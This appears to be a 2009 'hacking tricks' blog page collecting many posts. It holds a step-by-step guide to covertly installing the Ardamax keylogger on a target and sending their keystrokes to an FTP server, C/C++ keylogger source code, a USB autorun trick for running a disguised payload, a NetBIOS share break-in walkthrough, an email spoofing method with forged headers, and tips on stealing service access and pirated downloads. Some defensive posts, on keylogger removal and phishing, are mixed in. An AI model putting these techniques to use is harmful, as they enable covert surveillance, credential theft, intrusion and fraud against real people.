The average PC has several programs wanting to use the processor at any one time, and so Windows allocates each a period of CPU time – a 'quantum' – before moving to the next. By default this is very short, which makes for a responsive PC, but it sometimes means that Windows wastes time just switching between processes.
The solution? You can try what Windows Server does: set up your system to use a long quantum. Set 'HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl\Win32PrioritySeparation' to 16 (hex).
Longer quantums mean fewer switches between programs and so less wasted time. It can push some programs too far, though, and you might begin to notice games lagging or video playback becoming less smooth. If you spot any problems, just restore the original Win32PrioritySeparation value (probably 26 hex).
20. Disable AutoRun
Windows' AutoRun feature is a potential security risk because it automatically runs code when you connect removable devices to your PC. If you can put up with the inconvenience of doing things manually then it's safest to disable it.
On some systems, this can only be done from the Registry. To do so, go to 'HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\IniFileMapping' and create a key called 'Autorun.inf'.
Next, double-click the new key's (Default) value and enter the new value '@SYS:DoesNotExist'. Now delete the Registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2'. Windows now won't automatically run any code on CDs, DVDs or removable drives; you will have to manually launch it.
Saturday, April 18, 2009
How to Detect invisible persons in yahoo
trace invisible users in yahoo
Many people nowdays prefer to stay offline while using Yahoo! Messenger - mostly done to avoid someone. There are many ways of finding people who are online but yet invisible.
First Method: Doodle Method
1. Double Click on the user whose status you want to check.
2. A message window will open.
3. Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
4. The last step and the most important step. After loading the Doodle IMVironment, there will be two possibilities.
a) If the user is offline, the Doodle area will show “waiting for your friend to load Doodle” continuously.
b) If the user is online (in invisible mode), after few seconds (it can take up to one minute, depending on connection speed), you will get a blank page. So the user is online!
Second Method: Voice Chat Method
1. Double Click on the user whose status you want to check.
2. Click on “Voice” icon on the toolbar, or select “Contact” menu and select “Enable Voice Chat” .
3. The deciding part… there are 2 possible results:
a) If the user is offline, you will get this message: “Internal server error. Cannot obtain voice token to start voice chat.”
b) If the user is invisible (actually online), you will see the Voice Toolbar.
Third Method: Conference Invitation
1. Right Click on the user whose status you want to check.
2. When the menu appears, select Invite to Conference.
3. A window will appear. See at the right pane, the username you selected will be there. Now, click Invite.
4. The deciding part… there are 2 possible results:
a) If the user is offline, you will get this message: “None of the users in the invite list are available to join the conference. Please try at a later time.”
b) If the user is invisible, you will get a window similar saying: “You are now logged into voice conference -
beside this you can use website like
www.scanyahoo.co.cc
www.scanyahoo.com
www.ydetector.com
to know invisible guys
Thursday, April 16, 2009
Quick Tutorial to hacking for autorun for USB Flash drives
Autorun will not work with “regular” USB flash drives the way that they do with CD-ROMs, but there are some tricks that you can do that will come very close. I say “regular” in that as many may know there are ways of modifying U3 drives so that they appear as CD-ROMs on Windows systems and can thus use autorun to silently run your “tools” without any indication anything is happening. The U3 hack however is a bit more complicated, I will do another “How to” on that later. For now let’s just discuss how we can create an autorun.inf file on a regular ‘ol USB flash drive that will do some interesting things.
Also it is important to mention that some of these techniques will even work if autoplay is disabled!
First, although we cannot have an application run automatically with a traditional USB drive, we can make it so that when a USB drive is plugged we have Windows make a suggestion to the user and all they need to do is click “OK” to a specific application or script you have deployed to the flash drive.
First in Notepad create a file called autorun.inf and save it to the root of your USB flash drive of choice. In the autorun file put this:
[autorun]
icon=lilguy.ico
open=howdy.bat
action=Click “OK” to play this fun game!
The first parameter is “icon” this tells Windows what icon to use as the icon image for the drive etc. This is important for the social engineering portion of the trick, you must consider your target. The image you choose should help instill trust in the application they are about to run, maybe a tantalizing icon of a scantly clad babe, a puppy, or my favorite a cute little cartoon devil holding a USB flash drive.
The “open” parameter indicates the program you wish to run, this can be an executable, or as in this case a .bat file. You could even call a .bat file which calls a series of executables. Go crazy.
The next parameter is “action” this is what will trigger the autorun dialog to appear. This text will appear in the dialog box along with your icon, so you probably want make this friendly, something like “Fun Game,” you probably don’t want to put something like “Click ‘OK’ to install backdoors and trojans!”.
Now unplug your flash drive and then replug it in, a dialog box like this should now appear:
So this is not as good as automatically running the application, but is useful nonetheless and there have actually been successful simulations where this has been used. A security consultancy used this technique as a proof of concept to test a credit union client of theirs. Several drives used this simple technique to run exectue a trojan that sent some simple data to an external email account. They scattered the drives in the parking lot, several employees picked the drives up on their way into work and within a short amount of time the email account they had set up was receiving emails.
Now we have our basic autorun.inf setup. But notice that if you click cancel and then click on the drive you just see the contents of the drive. However we can take this one step further, if the user is smart and their spidey senses are tingling from the dialog menu that appears and they click cancel, with the addition of one more line of code to the autorun.inf file that will automatically execute the code we specify when they click the drive either from “My Computer” or Explorer. This is different than a true autorun as it still requires a user to take an action to exectue the application, but still a significant security risk.
Add these lines to your autorun.inf file
[autorun]
icon=lilguy.ico
open=howdy.bat
action=Click “OK” to play this fun game!
shell\open\command=howdy.bat
OK save it and then unplug and plug the drive back in again. This time when the prompt appears hit “cancel”. Now go to double click the drive under “My Computer”. The application will automatically execute. By the way, this second portion will still work even if autoplay is disabled on a system and is actually more dangerous than the dialog in my opinion.
So what if we don’t want to execute a command on the drive and just open a webpage? You could execute Explorer in your .bat file to do this, or in the exectuble you run, but there is a quick and easy way to do this in the autorun.inf file. Replace the last line with this instead:
[autorun]
icon=lilguy.ico
open=howdy.bat
action=Click “OK” to play this fun game!
shellexecute=http://www.usbhacks.com
There we have it. An introduction to the wonderful world of autorun.inf hacks for USB flash drives. Again this should only be tested on your system, or systems you have permission to use this on, we are not responsible for your stupidity. Removable media devices don’t deploy malicious code and steal data, people do
Disclaimer: This tutorial is designed to show existing vulnerabilities and should only be used on systems you own, or have permission to execute this on. Removable media devices don’t deploy malicious code and steal data, people do.
Nmap for USB
Nmap is a free open source tool used for network exploration and vulnerability auditing. Using Nmap a user can quickly scan large networks as well as target specific hosts. Nmap uses IP packets in unique ways to figure ouw what hosts are available on a given network and can determine what operating system it is running as well as determine what services (including versions) it is running and can also discover what type of packet filters and firewalls are in use. Recent versions have been modified to run straight from a USB flash drive download it here
Wireshark for USB
WiresharkWireshark is a free protocal analyzer, also called a packet sniffer that is used for network troubleshooting, analysis and protocol development. The tool allows the user to see all traffic being passed over a network when putting a network card into what is known as “promiscuous mode”.
S0me versions now have the capability to run independently from a USB flash drive and no longer require that WinPCap or other third-party packet capture drivers to be installed on a system
Torpark an ultimate browser for hackers
The Torpark browser is a modified version of Firefox that can run off of a USB drive and uses anonymous proxies and encryption to mask user behaviour. The browser has been developed by Hacktivisimo, a group of hackers, human rights workers, lawyers and artists.
The browser uses the Tor network of routers setup by the Electronic Frontier Foundation to anonymize web traffic.All you need to do is copy the files to your USB thumb drive. The browser will encrypt traffic between the computer and the Tor router network, this makes it difficult to spy on traffic and pinpoint who is doing what in terms of browsing behaviour.
The Tor netwok also regularly changes the users IP address which makes it even more difficult to track browsing sessions.On one hand this tool is a wonder for online security, however it has a darkside. One feature of the Torpark browser is that it can run directly off of a USB flash drive. This could cause headaches for some IT administrators who may be restricting employee’s browsing behaviour for intellection property issues , or acceptable use policies. Since the browser does not need to be installed on the system and can simply be run from a USB flash drive, it opens the door for a long list of potential endpoint security threats.
Wednesday, April 8, 2009
List of Rapidshare Premium Link Converging Websites
List Of the site offering premium Link maker service
use them and download your stuff easily
1. khongbiet.com (.com currently out of bandwidth)
2. rapidhack (.com / .de)
3. free-premium-links (.com 5attempt /day)
4. Rapidshare.co.in ( .com 5 attempt / day)
5. http://www.downloadmyupload.com
6. http://computeraxes.com/rapid
7. http://www.premiumrapid.com
8. http://www.rapidshack.us/
9. http://megaez.com/
10. http://khongbiet.com/
11. http://mymegalink.net/
12. http://rapid-hook.com/
13. http://www.rapidl.com/
14. http://www.rapidrip.com/
15. http://www.rapidsharepremiumlinkgenerator.com/
16. http://rapidlysharing.com/
17. http://www.rapidshareplus.com/
18. http://www.fastlister.net/rs/
19. http://www.lcheat.com/rs7/
20. http://rapid-ripping.com/
20. http://x92.org/
21. http://www.rapidleechers.com/
22. http://www.rapidshare-premium-downloader.com/
23 http://www.premium4me.com/rapid.html
24. http://www.premiumrapid.com/rapid.html
25. http://www.download-crazy.com/rapid
26. http://www.grab-w.net/
27. http://www.t5f.net/
28. http://www.rapid-premium.wb.st/
Ardamax Keylogger Tutorial
A step-by-step guide to successfully creating a deployment package, sending it, and receiving information using Ardamax Keylogger. Now, in this guide, I only use one method of recieving information, and that's an FTP. I also do not protect the files. Any suggestions and comments are appreciated. Let's begin.
Head on over to:
CODE
http://www.ardamax.com/keylogger/
And scroll to the bottom. Download the free trial.
After downloading, open the program and install it. Simple enough, right? After installing, go to wherever you installed it at, and open it. It should open at the bottom right corner of your screen, down by the time. If not, press ctrl+shift+alt+h. Now, leave that alone.
Next, go to:
CODE
http://www.theserials.com/serial/serial_ardamax.html
Download the appropriate serial.
Now, open it, and it should give you a name and a jumble of letters and numbers.
A step-by-step guide to successfully creating a deployment package, sending it, and receiving information using Ardamax Keylogger. Now, in this guide, I only use one method of recieving information, and that's an FTP. I also do not protect the files. Any suggestions and comments are appreciated. Let's begin.
If you want to attach the keylogger to an existing file, go ahead and place that on your desktop.
~NOTE~
Again, right click the icon at the bottom-right.
Click "Remote Installation".
Click next.
Now, if you want to attach your keylogger to an existing file, tick the box that says "Append keylogger engine to.." etc etc.
If you tick it, click Browse, and select the file.
If not, continue down. The installation folder on target computer needs to remain Windows System Folder for added security, so leave it be.
Add any additional components you would like. I just leave mine as "log viewer" since all I grab are passwords from games.
From this point, click next.
Now, this part is self explanatory. I tick all of the boxes, as to hide it from everything visible, otherwise they can just see it and be like "Wtf", uninstall, etc.
Can't have that, now can we?
Click next.
For Security, do what you want. I leave all of it as-is and click next again.
Now, untick the "Check for updates" box, else it will check for updates on their computer and they will know that they are bugged.
Click next.
Tick the "Start in hidden mode" box, and leave the "Run on windows startup" as-is.
You may pick a date to self destruct, if you like. Sounds noisy, right? It simply removes itself on selected date. If not, leave it alone, and it will never self destruct.
Click next.
Tick the "Send logs every.." box, and choose how frequently you would like to recieve information that has been sent.
Select 'FTP' and de-select everything else as a delivery method.
You may choose what you want to see. I take out screenshots. Causes lag for me.
Leave log format alone.
You may choose to send logs if it exceeds a certain size, or if you want it to send no matter what, untick the box, which is what I do.
Continue on! (next.)
Now the fun part. -_-.
Head on over to:
CODE
http://phpnet.us/
Make an account, etc etc.
Save your FTP Account name and password. You'll need it in a moment.
This site will be the site that holds all information recieved by the keylogger.
When you're done, scroll down a bit.
Under "FTP Accounts", click "File Manager".
Near the top, click the "New Dir" button, and create a directory by any name you want. My favorite is "lolbeans".
Now, hold that thought. Bring the keylogger back.
In Ftp Host, put in:
ftp.phpnet.us
In "Remote Folder", put in the new directory's name you made. So, in this scenario, "lolbeans" without the "'s.
Fill in your Username and Password.
I leave Passive Mode checked because I'm not sure what it does, rofl. :[
Leave port alone as well. It's default.
Now to make sure everything is correctly done, click test. It should tell you it all went through. And to double check, you can refresh your open window. Click your "lolbeans" directory and there should be a test file in it.
Click next, if you're still alive.
Tick anything and everything you want.
Next.
If you selected screenshots to be enabled, pick how you want them delivered. Click next. If not, ignore this step.
Browse where you want the keylogger to be placed. You can also change the icon, which is nifty. If you're apologizing to a bitch ex girlfriend/boyfriend of yours, you can change the icon to a notepad and name it "Apology", and they fall for it.
Next.
This screen will go over with you everything that you have chosen. Make sure it's all correct.
Click Finish.
Now, if you appended the keylogger to something, you're going to need to put the "install" (feel free to rename it so it's not so obvious) and appended file into a .zip or .rar file.
If not, you have the simple "Install" on your desktop. Also, feel free to rename it to something like "Apology" or "OMFGFunnypicture!!!.jpg"
Upload the file or .rar/.zip somewhere, and let your target download it. They will double click it, and on their end, nothing will happen, but secretly, they have been keylogged.
Check your FTP Directory that you made as frequently as you told it to send logs, and you'll have everything you need.
First test it out on yourself.
How to Avoid and Remove a Keylogger
A keylogger is a dangerous program that runs invisibly as a low level system process. Usually started up when your computer Starts - so its impossible to detect it - a keylogger logs all the keystrokes that you type on keyboard and then sends that info to the person who infected you with the keylogger.
Keyloggers can be used to steal personal information such as your social security number, credit card number, and passwords. Keyloggers are especially dangerous to anyone who uses online cash sites like PayPal for a large amount of money transfers.
When you suspect that you are infected with a keylogger, do NOT type any personal information. Even if you are typing in a normal word document, the keylogger still track everything and where ever and what ever you type.
If you need to login to your Email or somewhere secure and password protected, this is the only way to get rid of the keylogger.
Click Start -> All Programs -> Accessories -> Accessibility -> On-Screen Keyboard
Doing this opens up a keyboard on your screen so that you can click whatever letter you would like to type. Since a keylogger does not track where and what you click, this helps you to get rid of it in times of urgency. Typing with the on-screen keylogger is a great loop hole for a keylogger. The only alternative is the remove the keylogger completely.
Detecting a keylogger is more important before you remove it because doing that is not such easy thig. It can be installed in many places on your computer, usually located in one of the system files. However, there is a much easier way to detect if a keylogger is running or not. Right click on your menu bar and click Task Manager or simply press Ctrl + Alt + Del. You should take a look on all the applications which are running at the moment. Click Processes tab. This gives you info about all the programs, hidden and visible that your computer is currently running.
Unless you know a lot about which processes the computer runs and does not run you will have trouble figuring out what is a keylogger and what not. The keylogger will show up on the list of processes as well as many other programs and background processes. However, you may not be able to find the difference between all the processes.
So you need to know which is a keylogger before you can stop it. There are many sites available on the Internet that provides a vast amount of information on each and every process that you may encounter. One of these sites is Liutilities. This site provides some background information on each process as well as telling you the author and which program it is part of. One of the best features of this site includes a recommendation about what to do with that process. Most of the time, the process you look up will be harmful and simply part of the operating system or another program you are running.
Another fantastic site for information on processes is Neuber. As with Liutilities, Neuber gives you background information on that process. A special feature they have is user created comments. Anyone can rate a process in terms of its security a leave a comment about how to deal with the process. Generally, these comments are very accurate. Neuber also provides a 'security rating' for each process based on the average rating by users.
However, some find it hard and long drawn out to research each process individually. There is an alternative program called Security Task Manager that is free to download. It will display information about each of the processes that are currently running, as well as telling you if they are dangerous or not. You will immediately be notified should anything harmful come up. Produced by Neuber, the program also shows the security rating and a random comment made by a user for each process. This program does have its disadvantages though. Processes that the program has never encountered before are not given a security rating or a comment. It is therefore advised that you research these processes individually.
Once you have found the harmful process, click the process and then click the 'End Process' button towards the bottom right. The process you have selected should be terminated immediately.
Once this is complete, you should be safe until you reboot your computer. If you do not delete the keylogger, upon rebooting your computer, the keylogger will start up again.
Once you have stopped the keylogger, run anti-virus and spyware checks on your entire computer. Some free virus scan utilities that are recommended are A2, Dr. Web and AVG. However, highly advanced keyloggers such as TypeAgent, KGB, and SpyOutside can often slip through these scans and remain undetected.
If the anti virus scans fail to show any result, you will need to manually detect and delete the keylogger. Keyloggers are usually located in the system files, so do not delete anything that you aren't 100% sure is the keylogger. Doing so may lead to errors in other areas of the computer. Go to 411-spyware and search for the type of keylogger that has infected your system. If it is listed, there should be instructions about how to manually remove the keylogger.
A great way to check if the keylogger has been completely removed from the system is to reboot. Remember the name of the keylogger's process and reboot the computer. If the process is not there when the computer has rebooted, you are safe.
Keylogging fun for C/C++ Beginners
The examples below are for beginners in C/C++ with some basic knowledge of the windows - API.
1. Global hook
Hook: A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure.
Available hooks:
WH_CALLWNDPROC
WH_CALLWNDPROCRET
WH_CBT
WH_DEBUG
WH_FOREGROUNDIDLE
WH_GETMESSAGE
WH_JOURNALPLAYBACK
WH_JOURNALRECORD
WH_KEYBOARD
WH_KEYBOARD_LL
WH_MOUSE
WH_MOUSE_LL
WH_MSGFILTER
WH_SHELL
WH_SYSMSGFILTER
To install a hook you call this API-function:
HHOOK SetWindowsHookEx(
int idHook, // type of hook to install
HOOKPROC lpfn, // address of hook procedure
HINSTANCE hMod, // handle to application instance
DWORD dwThreadId // identity of thread to install hook for
);
- idhook
Specifies the type of hook procedure to be installed. We choose “WH_KEYBOARD_LL” (13).
- lpfn
The LowLevelKeyboardProc hook procedure is an application-defined or library-defined callback function used with the SetWindowsHookEx function. The system calls this function every time a new keyboard input event is about to be posted into a thread input queue. The keyboard input can come from the local keyboard driver or from calls to thekeybd_event function. If the input comes from a call to keybd_event, the input was “injected”.
The HOOKPROC type defines a pointer to this callback function. LowLevelKeyboardProc is a placeholder for the application-defined or library-defined function name.
LRESULT CALLBACK LowLevelKeyboardProc(
int nCode, // hook code
WPARAM wParam, // message identifier
LPARAM lParam // pointer to structure with message data
);
- hMod
In this case, our instance handle.
- dwThreadId
Specifies the identifier of the thread with which the hook procedure is to be associated.
If this parameter is zero, the hook procedure is associated with all existing threads.
Now we know enough to create our first keylogger, using a global keyboard hook:
————————————————————————————————————————–
#include
#include
#define FILENAME “keylog.txt”
void CheckKey(int key);
LRESULT CALLBACK KeyboardHook(
int nCode, // hook code
WPARAM wParam, // message identifier
LPARAM lParam // pointer to structure with message data
);
typedef struct tagKBDLLHOOKSTRUCT {
DWORD vkCode; // virtual key code
DWORD scanCode; // scan code
DWORD flags; // flags
DWORD time; // time stamp for this message
DWORD dwExtraInfo; // extra info from the driver or keybd_event
} KBDLLHOOKSTRUCT, FAR *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;
HHOOK hHook;
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow )
{
hHook = SetWindowsHookEx(13, KeyboardHook, hInstance , 0);
while (GetMessage(NULL,NULL,0,0)) ; // NOP while not WM_QUIT
return UnhookWindowsHookEx(hHook);
}
LRESULT CALLBACK KeyboardHook (int nCode, WPARAM wParam, LPARAM lParam )
{
if (nCode == HC_ACTION)
if (wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN)
CheckKey (((PKBDLLHOOKSTRUCT)lParam)->vkCode);
return CallNextHookEx(hHook, nCode, wParam, lParam);
}
void CheckKey(int key)
{
FILE *pfile = fopen(FILENAME,”a+”);
// translate virtual key code to ascii
// and write it to file..
fclose(pfile);
}
————————————————————————————————————————–
2.
GetAsyncKeyState()
The GetAsyncKeyState function determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.
SHORT GetAsyncKeyState(
int vKey // virtual-key code
);
- vKey
Specifies one of 256 possible virtual-key codes.
This is our second keylogger, now using GetAsyncKeyState() :
————————————————————————————————————————–
#include
#include
#define FILENAME "keylog.txt"
void CheckKey(int key);
void main()
{
while(1)
{
Sleep(10); // avoid 100% cpu usage
for(int key=8; key<=190; key++)
if (GetAsyncKeyState(key) == HC_ACTION)
CheckKey(key);
}
}
void CheckKey(int key)
{
// …
}
==========================================================================================================================
The CheckKey() function may look like :
void CheckKey(int key)
{
FILE *pfile = fopen(FILENAME,”a+”);
if (key==8)
fprintf(pfile,”%s”,”[del]“);
if (key==13)
fprintf(pfile,”%s”,”\n”);
if (key==32)
fprintf(pfile,”%s”,” “);
if (key==VK_CAPITAL)
fprintf(pfile,”%s”,”[CAPS]“);
if (key==VK_TAB)
fprintf(pfile,”%s”,”[TAB]“);
if (key==VK_SHIFT)
fprintf(pfile,”%s”,”[SHIFT]“);
if (key==VK_CONTROL)
fprintf(pfile,”%s”,”[CTRL]“);
if (key==VK_PAUSE)
fprintf(pfile,”%s”,”[PAUSE]“);
if (key==VK_ESCAPE)
fprintf(pfile,”%s”,”[ESC]“);
if (key==VK_END)
fprintf(pfile,”%s”,”[END]“);
if (key==VK_HOME)
fprintf(pfile,”%s”,”[HOME]“);
if (key==VK_LEFT)
fprintf(pfile,”%s”,”[LEFT]“);
if (key==VK_UP)
fprintf(pfile,”%s”,”[UP]“);
if (key==VK_RIGHT)
fprintf(pfile,”%s”,”[RIGHT]“);
if (key==VK_DOWN)
fprintf(pfile,”%s”,”[DOWN]“);
if (key==VK_SNAPSHOT)
fprintf(pfile,”%s”,”[PRINT]“);
if (key==VK_NUMLOCK)
fprintf(pfile,”%s”,”[NUM LOCK]“);
if (key==190 || key==110)
fprintf(pfile,”%s”,”.”);
if (key >=96 && key <= 105)
{
key -= 48;
fprintf(pfile,”%s”,&key);
}
if (key >=48 && key <= 59)
fprintf(pfile,”%s”,&key);
if (key !=VK_LBUTTON || key !=VK_RBUTTON)
{
if (key >=65 && key <=90)
{
if (GetKeyState(VK_CAPITAL))
fprintf(pfile,”%s”,&key);
else
{
key = key +32;
fprintf(pfile,”%s”,&key);
}
}
}
fclose(pfile);
}
The virtual key code table -> google. Compiled with MS VC++ 6.0.
bugs:
Writing text in reverse order
# Type the text in the scrapbook or any text box.
# Type & # 8 2 3 8 without spaces before the message in the text box.
# Example: " This is message reverted."
# Press SUBMIT.
# The above message appears as -
This is message reverted
Write Anonymous scraps
# Create a fake account.
# Write the scraps to the person you want.
# Delete the account.
# Your scraps from the deleted account becomes anonymous
Knowing Email ID of any profile on Orkut
# Ignore the person of whom you want to know the Email id.
# Open your Gtalk of the same account as Orkut.
# Go to Settings -> Blocked
# You can see the ignored person's email id.
Infromation on How your orkut Account gets Hacked, or How you can save your orkut account
Google uses a 4 Level Orkut login which makes it difficult to hack using brute force method.
1st Level Security-SSL or 128 bit secured connection
2nd Level Google account checks for cookie in the sytem of user
3rd Level Google provides a redirection to the entered User information
4th Level Google doesn't use conventional php/aspx/asp coding so impossible to attack using input validation attack!!
It is not an easy task to break this security! But still some people manages to get access to other accounts. The question concerned is How they do it? Many of them just use simple tricks that be fool users and then they themselves leak out their password. Here are some points you need to take care of, to prevent your Orkut account being hacked!
Phishing Attack is the most popular way of stealing other's password. Popular by the name of fake login (among those who knows it!!) the users land on a page where they are asked for their login information and they enter their username and password thinking it to be a real page but actually it is other way round. It submits all the details entered to the programmer or the coder.
Community Links: Many times you are provided with a link to a community in a scrap. Read the link carefully, It may be something like http://www.okrut.com/Community.aspx?cmm=22910233 OKRUT not ORKUT. Clicking on this link will take you to a fake login page and there you loose up your password.
Orkut New Features: I have come across a page that looks like they are giving the user a choice of selecting new features for orkut with your ID and password, of course!! When user submit the page, there goes his ID and password mailed to the coder.
Java script: You must have seen the circulating scraps that asks you to paste this code in your address bar and see what happens! Well sometimes they also leak out your information. Check the code and if you are unsure of what to do, then I recommend not to use it.
Primary mail address: If by some means a hacker came to know password of your Yahoo mail or Gmail, which users normally keeps as their primary mail address in their Orkut account, then hacker can hack Orkut account by simply using USER ID and clicking on 'forget password'.This way Google will send link to the already hacked primary email id to change the password of the Orkut account. Hence the email hacker will change your Orkut account's password. Hence your Orkut account hacked too.
So a better thing would be to keep a very unknown or useless email id of yours as primary email id so that if the hacker clicks on 'Forgot password' the password changing link goes to an unknown email id i.e. not known to the hacker.
Hence your Orkut account saved.
Friday, April 3, 2009
Free internet connectivity for pc or laptop through AIRTEL prepaid
Here is a hacking trick to connect to the internet with airtel prepaid free
You need a PC or a Laptop and the required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle
1) Activate Airtel Live! ( It’s FREE so no probs)
2) Create TWO Airtel gprs data accounts (yep TWO) and select the
FIRST as the active profile.
3) Connect your mobile to the PC (or Laptop) and install the driver for
your mobile’s modem.
4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows
Connecting Device : Your mobile’s modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2#
Username and Password : blank
5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)
6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).
7) Pick up your mobile and try to access any site. You will get “Access
Denied…”(except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.
8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and…….WAIT
Netbios Tutorial
Here is a common hacking techniques used by some hacker ..
This is for educational purpose only, this hack works with unpatched version of Windows 2000/NT/XP. (only works if the shared drive that has no password set by administrator)
Step 1:
-Get a IP (range) scanner.
-Scan the victim's ip on TCP/IP port 1XX (i put some XX in the port number so as di cya magaya for actual testing)
Most port scanners (nmap being the most prominent example) correctly
report ports as either open, closed or filtered.
"Mahirap" o hard to find some open port open these days because of firewall (sa patched windows)enable that will either "filtered or closed" ang port if u used ip scanner..
What is filtered or closed port?
Use an analogy of the cops coming to your place and looking for you. Having a filtered port is like them knocking on the door, and you saying "I'm not here". Having a closed port is like them knocking on the door, and no one answering. With a filtered port, you know there is an active system behind that port.
As far as from a security standpoint, to most hackers, when they see closed they don't think of a firewall, they think the service is just not running. When I see filtered, and its a port I want to get to, I instantly think, oh, ok, is there some backdoor I can punch thru the firewall? Can I DOS the firewall? Can I remotely administer the firewall?
Step 1.1
-Open a dos prompt
-Do this by going to start/run
-Type cmd
When you are already in DOS command prompt type
-NMAP -v -p 159 77.106.2.1-110 (example target ip range)
-when you got an open port proceed to step 2
Step 2
This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.
c:\windows>nbtstat -a 255.255.255.255
If you see this your in:
Step 3
type down:
c:\windows>net view \\255.255.255. 255
Step 4
type down:
c:\windows>net use x: \\255.255.255. 255\SYSVOL
(you can replace x: by anything letter you want but not your own drive
letters.)
Note:SYSVOL is the name of the shared harddrive.
If the command is successful we will get the confirmation.
The command was completed successfullly.
Bingo your inside the system now..
You can now execute any dos command e.g. x:\dir
(you will experience a lag in the system since it is a remote computer)
Now open windows explorer or just double click on the My Computer icon
on your desktop and you will see a new network drive X:\> . Now your are a
hacker.
This tutorial is warning for those who have old OS like unpatched XP,NT,2000..always protect ur system..upgrade ur o system.. ..protect your port specially port 139..Remember Hacking other`s comp is stealing..
How to send Anonymous Email
Sometimes you may need to send an email anonymously.
There are several web based utilities that allow this, but each one registers the ip info in the headers which allows tracing. They also will not allow you to use a proxy and utilize their service. This is for security reasons.
My definition of anonymous includes the email addresses appearing as if they have been sent from whatever address you specify as well as no accurate record of your IP in the headers of the mail that could be traced back to you.
The method that follows supports my definition of anonymous.
Amazingly, all you need to accomplish this is telnet and a SMTP server. Allow me to break it down.
Telnet is a software application that connects one machine to another, allowing you to log on to that other machine as a user.
If you don't have telnet, you can easily download it for free from the web - do a search on "telnet" or "download telnet” in any search engine.
...and just for the sake of being thorough...
What is SMTP?
SMTP stands for "Simple Mail Transfer Protocol"
Basically just a protocol for sending e-mail.
Where do you get a SMTP server?
Heres a few links, but as always be aware that these sites may not be here forever or their content may change. Searching for "SMTP servers" or "SMTP server list" should produce effective results.
http://www.gr0w.com/help/email_help_smtp_servers.htm
http://www.uic.edu/depts/accc/ecomm/smtpmove/isps.html
http://www.thebestfree.net/free/freesmtp.htm
http://www.registerdirect.co.nz/help/smtp_servers.html
http://www.bu.edu/pcsc/email/remote/smtplist.html
Once you've selected a server, open the command prompt, and type:
telnet xxxxxx.com 25
(Obviously replace the x's with the SMTP server you've selected) now type the following:
HELO targetsmailserver.com
MAIL FROM: whoever@whatever.com
RCPT TO: target@address.com
DATA
from: whoever@whatever.com
to: target@address.com
subject: whatever
received: xxx.xxx.xxx.xxx
x-header: xxx.xxx.xxx.xxx
The body of the message goes here
.
*Note 1: Remember to end with "." on a line by itself as directed.
*Note 2: Adding x-header and received allows you to alter the IP information found in the headers of the mail, making it untracable and totally anonymous**
*Note 3: There are ISPs that have port 25 (SMTP) blocked. Be sure your settings and ISP allow connections to port 25. If all else fails, get the SMTP sever address from your ISP
Tuesday, March 31, 2009
Download Any Book From Google Books
hi I am back with this another hacking trick
Google Book Search(books.google.com), as you know, is a large online repository of books. You can enter a query and Google Book Search will search within the book and return you the results. You can then see a preview of the book and read it.
Some books are available in their entirety, some have limited previews and the others have no previews at all. It so happens that often one needs only a topic or two from a specific book. While the Internet is a good source and has plenty of free ebook sites, I have quite often seen people trying (unsuccessfully of course) to copy-paste, save images or take screen shots of Google Book search results. In this post I am going to show you how to download books from Google Books search.
So, if you have been in a similar situation where you badly wanted a page or two of the book, try the Google Books Downloader. http://www.codeplex.com/GoogleBookDownloader
Just download, extract and run the application (make sure you have .NET 3.5 on your system).
Go to the Google Books page for the book you want to download.
Copy and paste the book code of the book you want to download.
Click the “check” button to check if GBD finds the required book and returns the available pages.
Click the “download entire book” button. GBD will now download the book. The number of pages downloaded will depend on the number of pages that are available. If the entire book is available like those in the public domain then GBD will download the entire book.
Once the download has completed, you can save the book as a PDF file by clicking on the “Save Book” button.
Now read the book! Of course you can use the application to download books that were not supposed to be downloaded. So you are advised to download the books with caution and at your own discretion. The download takes quite some time to complete so you may have to wait a little before you can reap the benefits of a downloaded book!
Subscribe to:
Posts (Atom)
When reproducing our materials in whole or in part, hyperlink to the articles should be strictly made
This work is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 2.5 India License.
This work is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 2.5 India License.
Posts
